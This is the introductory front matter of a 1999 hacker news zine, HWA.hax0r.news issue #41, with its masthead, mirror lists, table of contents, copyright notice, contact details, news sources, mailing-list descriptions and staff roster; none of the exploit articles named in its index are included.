[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                    <=-[ HWA.hax0r.news ]-=>                            =
==========================================================================
[=HWA'99=] Number 41 Volume 1 1999 *Nov 7th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
* This issue covers Oct 31st to Nov 7th but was released on Nov 14th
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================

Today the spotlight may be on you, some interesting machines that have
accessed these archives recently...

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting! http://www.csoft.net/~hwa

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

The Hacker's Ethic

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative. Among true
computer people, being called a hacker is a compliment. One of the traits
of the true hacker is a profoundly antibureaucratic and democratic spirit.
That spirit is best exemplified by the Hacker's Ethic.

This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking, not bogus criteria such as
    degrees, age, race, or position.
5 - You create art and beauty on a computer.
6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

A Comment on FORMATTING:

Oct'99 - Started 80 column mode format, code is still left untouched since
formatting will destroy syntax.

I received an email recently about the formatting of this newsletter,
suggesting that it be formatted to 75 columns. In the past I've endeavoured
to format all text to 80 cols except for articles and site statements and
urls, which are posted verbatim. I've decided to continue with this method
unless more people complain. The zine is best viewed in 1024x768 mode with
UEDIT.... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

New mirror sites

http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/

* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

*  Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed the file
   size limitations imposed by the sites :-( please only use these if no
   other recourse is available.

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html.   ** NEW **
http://www.alldas.de/hwaidx1.htm           ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.           *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (remember i'm doing this for
me, not you, the fact some people happen to get a kick/use out of it is of
secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ
or ISN, nor could any other 'digest' of this type do so. It *is* intended
however, to complement such material and provide a reference to those who
follow the culture by keeping tabs on as many sources as possible and
providing links to further info. It's a labour of love and will be
continued for as long as I feel like it; i'm not motivated by dollars or
the illusion of fame. Did you ever notice how the most famous/infamous
hackers are the ones that get caught? There's a lot to be said for
remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
                    Welcome to HWA.hax0r.news ... #41
=-----------------------------------------------------------------------=

We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by and
idle a while and say hi...

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you its for  ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... 
***                                                             ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=--------------------------------------------------------------------------=
                                Issue #41
=--------------------------------------------------------------------------=
                                [ INDEX ]
=--------------------------------------------------------------------------=
 Key     Intros
=--------------------------------------------------------------------------=

 00.0 .. COPYRIGHTS ......................................................
 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
 00.2 .. SOURCES .........................................................
 00.3 .. THIS IS WHO WE ARE ..............................................
 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
 00.5 .. THE HWA_FAQ V1.0 ................................................

 `ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and
 loosely translated it means "Just because something is abused, it should
 not be taken away from those who use it properly." This is our new motto.

=--------------------------------------------------------------------------=
 Key     Content
=--------------------------------------------------------------------------=

 01.0 .. GREETS ..........................................................
 01.1 .. Last minute stuff, rumours, newsbytes ...........................
 01.2 .. Mailbag .........................................................
 02.0 .. From the Editor..................................................
 03.0 .. Fix Available For Very Powerful IIS Exploit .....................
 04.0 .. ULG Defaces Associated Press Web Site ...........................
 05.0 .. Jane's To Host Cyber Terrorism Conference .......................
 06.0 .. Trust Site Solution Released ....................................
 07.0 .. Hacker or Cracker or Neither. Which Word to Use? ................
 08.0 .. New Virus Discovered in London ..................................
 09.0 .. Krystalia, In Memorium ..........................................
 10.0 .. RealNetworks Changes Privacy Policy Amid Controversy ............
 11.0 .. JTF-CND Runs CyberWar Simulation ................................
 12.0 .. State Y2K Data Vulnerable .......................................
 13.0 .. Clinton Privacy Plan: Is it Enough? .............................
 14.0 .. Tempest Laws Reviewed ...........................................
 15.0 .. Russians Seize Nuclear Expert's Computer ........................
 16.0 .. Sir Dystic and Kevin Poulsen to Speak ...........................
 17.0 .. Invisible KeyLogger97 ...........................................
 18.0 .. Hoax: Gov-boi Killed in Car Accident (not).......................
 19.0 .. Australia Admits to Echelon .....................................
 20.0 .. DVD Copy Protection Broken ......................................
 21.0 .. Optus in Australia Compromised ..................................
 22.0 .. Romanian Finance Ministry Hit ...................................
 23.0 .. Reuters News Database Compromised ...............................
 24.0 .. Taiwan Vulnerable to Cyber Attack ...............................
 25.0 .. 30,000 Virus Threats Received by Authorities ....................
 26.0 .. Stupid User Mistakes (are a) Bigger Problem than Viruses ........
 27.0 .. Echelon Education Website Launched ..............................
 28.0 .. FTC Says Screw You and Your Privacy .............................
 29.0 .. ParseTV to Adopt New Format .....................................
 30.0 .. Meridian I hacking by BL4CKM1LK teleph0nics......................
 31.0 .. Adobe Fingers EBay Pirates ......................................
 32.0 .. India, Syria, Iran Have Offensive Cyberwar Abilities ............
 33.0 .. Singapore Launches Probe Into Defacement ........................
 34.0 .. Military Sites Invaded ..........................................
 35.0 .. Emergency FidNet Funding Canceled ...............................
 36.0 .. Cyberattacks Against DOD up 300 Percent .........................
 37.0 .. White House Says US Vulnerable to Cyber Attack ..................
 38.0 .. Russia Withholding Information on Computer Attacks ..............
 39.0 .. Who is Richard Smith? ...........................................
 40.0 .. Federal Guidelines for Searching and Seizing Computers ..........
 41.0 .. Canadian Defense Site Defaced ...................................
 42.0 .. Defacement of South Africa Statistics Site Investigated .........
 43.0 .. BT Network Administration/SYSTEM X/OMC network ops by Hybrid.....
 44.0 .. Defeating the Caller ID system by Hybrid.........................
 45.0 .. A buffer overflow exists on the VirusWall smtp gateway...........
 46.0 .. The Xnews guid...................................................
 47.0 .. BUFFER OVERFLOW IN IMG VIEWER....................................
 48.0 .. Eserv 2.50 Web interface Server Directory Traversal Vulnerability
 49.0 .. RFP9906 - RFPoison...............................................
 50.0 .. Realnetworks server buffer overflow exploit......................
 51.0 .. NT Print spooler vulnerability...................................
 52.0 .. Bind remote exploit (ADM)........................................
 53.0 .. Security Focus Newsletter #13....................................

=-------------------------------------------------------------------------------=

 AD.S .. Post your site ads or etc here, if you can offer something in
         return thats tres cool, if not we'll consider ur ad anyways so
         send it in. ads for other zines are ok too btw just mention us
         in yours, please remember to include links and an email contact.
         Corporate ads will be considered also and if your company wishes
         to donate to or participate in the upcoming Canc0n99 event send
         in your suggestions and ads now...n.b date and time may be pushed
         back join mailing list for up to date information..................
         Current dates: POSTPONED til further notice, place: TBA..........

 Ha.Ha .. Humour and puzzles ............................................
          Hey You!........................................................
          =------=........................................................
          Send in humour for this section! I need a laugh and its hard to
          find good stuff... ;)...........................................

 SITE.1 .. Featured site, ................................................
 H.W .. Hacked Websites ..................................................
 A.0 .. APPENDICES.........................................................
 A.1 .. PHACVW linx and references.........................................

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING.
LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED
the current link is http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
(C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc well, now you can. (w00t) please no more inflatable sheep or plastic
dog droppings, or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH!
POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~                  reading this from some interesting places, make
my day and get a mention in the zine, send in a postcard, I realize that
some places it is cost prohibitive but if you have the time and money be a
cool dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.
Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Websites;

sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/

@HWA

00.2 Sources ***
     ~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/            Electronic Underground Affiliation
http://ech0.cjb.net                   ech0 Security
http://axon.jccc.net/hir/             Hackers Information Report
http://net-security.org               Net Security
http://www.403-security.org           Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that
you don't care whether the article/email is to be used in an issue or not
and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info   (Far from complete)   Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~   ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin . To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq. I've
been archiving this list on the web since late 1993. It is searchable with
glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security
tools, documents, etc. But I will not tolerate any unnecessary or
nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are
responsible for the words that you post on this list and that reproduction
of those words without your permission in any medium outside the
distribution of this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring on
June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to
SECURITYFOCUS.COM.
What is Security Focus you ask? Wait and read below.

Other than the change of domains nothing of how the list is run changes.
I am still the moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The archives
go back longer than Netspace's and are more complete than Geek-Girl's.

The move will occur one week from today. You will not need to resubscribe.
All your information, including subscription options will be moved
transparently.

Any of you using mail filters (e.g. procmail) to sort incoming mail into
mail folders by examining the From address will have to update them to
include the new address. The new address will be:

BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability
database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums in the spirit
of BUGTRAQ where non-English speaking people or people that don't feel
comfortable speaking English can exchange information.

As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ
will continue to be the place to submit vulnerability information, but if
you feel more comfortable using some other language you can give the other
lists a try. All relevant information from the other lists which have not
already been covered here will be translated and forwarded on by the list
moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese)
which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will
be moderated by CORE SDI S.A. from Argentina (the folks that brought you
Secure Syslog and the SSH insertion attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same time
providing a comprehensive source of security information.
Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek
Girl herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If you
are interested in viewing the staff pages, please see the 'About' section
on www.securityfocus.com.

On the community creating front you will find a set of forums and mailing
lists we hope you will find useful. A number of them are not scheduled to
start for several weeks but starting today the following list is
available:

* Incidents' Mailing List. BUGTRAQ has always been about the discussion of
  new vulnerabilities. As such I normally don't approve messages about
  break-ins, trojans, viruses, etc with the exception of widespread cases
  (Melissa, ADM worm, etc). The other choice people are usually left with
  is email CERT but this fails to communicate this important information to
  others that may be potentially affected.

  The Incidents mailing list is a lightly moderated mailing list to
  facilitate the quick exchange of security incident information. Topical
  items include such things as information about rootkits, new trojan
  horses and viruses, source of attacks and tell-tale signs of intrusions.

  To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:

  SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along with
ten other forums over the next two months. These forums will be built and
moderated by people in the community as well as vendors who are willing to
take part in the community building process.

*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.

On the information resource front you find a large database of the
following:

* Vulnerabilities.
  We are making accessible a free vulnerability database. You can search
  it by vendor, product and keyword. You will find detailed information on
  the vulnerability and how to fix it, as well as links to reference
  information such as email messages, advisories and web pages. You can
  search by vendor, product and keywords. The database itself is the result
  of culling through 5 years of BUGTRAQ plus countless other lists and news
  groups. It's a shining example of how thorough full disclosure has made a
  significant impact on the industry over the last half decade.

* Products.
  An incredible number of categorized security products from over two
  hundred different vendors.

* Services.
  A large and focused directory of security services offered by vendors.

* Books, Papers and Articles.
  A vast number of categorized security related books, papers and
  articles. Available to download directly from our servers when possible.

* Tools.
  A large array of free security tools. Categorized and available for
  download.

* News:
  A vast number of security news articles going all the way back to 1995.

* Security Resources:
  A directory to other security resources on the net.

As well as many other things such as an event calendar.

For your convenience the home-page can be personalized to display only
information you may be interested in. You can filter by categories,
keywords and operating systems, as well as configure how much data to
display.

I'd like to thank the fine folks at NETSPACE for hosting the site for as
long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services useful. I
invite you to visit http://www.securityfocus.com/ and check it out for
yourself. If you have any comments or suggestions please feel free to
contact me at this address or at aleph1@securityfocus.com.

Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List
From: mea culpa
Subject: Where has ISN been?
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occurred, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe.

As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. They are providing the bandwidth, machine, and listserv that runs the list now.

Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and efficiently filter past the articles of no interest.

This list will contain:

  o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more.
  o Information on where to obtain articles in current magazines.
  o Security Book reviews and information.
  o Security conference/seminar information.
  o New security product information.
  o And anything else that comes to mind..

Feedback is encouraged.
The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list.

Please do NOT:
  * subscribe vanity mail forwards to this list
  * subscribe from 'free' mail addresses (ie: juno, hotmail)
  * enable vacation messages while subscribed to mail lists
  * subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s).

Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa'. ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion.

The ISN membership list is NOT available for sale or disclosure.

ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs.

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com.....: currently active/programming/IRC+

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland
Wyze1.............................: South Africa

Please send in your sites for inclusion here if you haven't already; also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events it's a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about, otherwise enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for?
Never mind, if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out, hax0r is "new skewl" and although it is laughed at, shunned, or even pigeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, I'd highly recommend you get that book. It's almost like buying a clue.

Anyway..on with the show .. - Editorial staff

@HWA

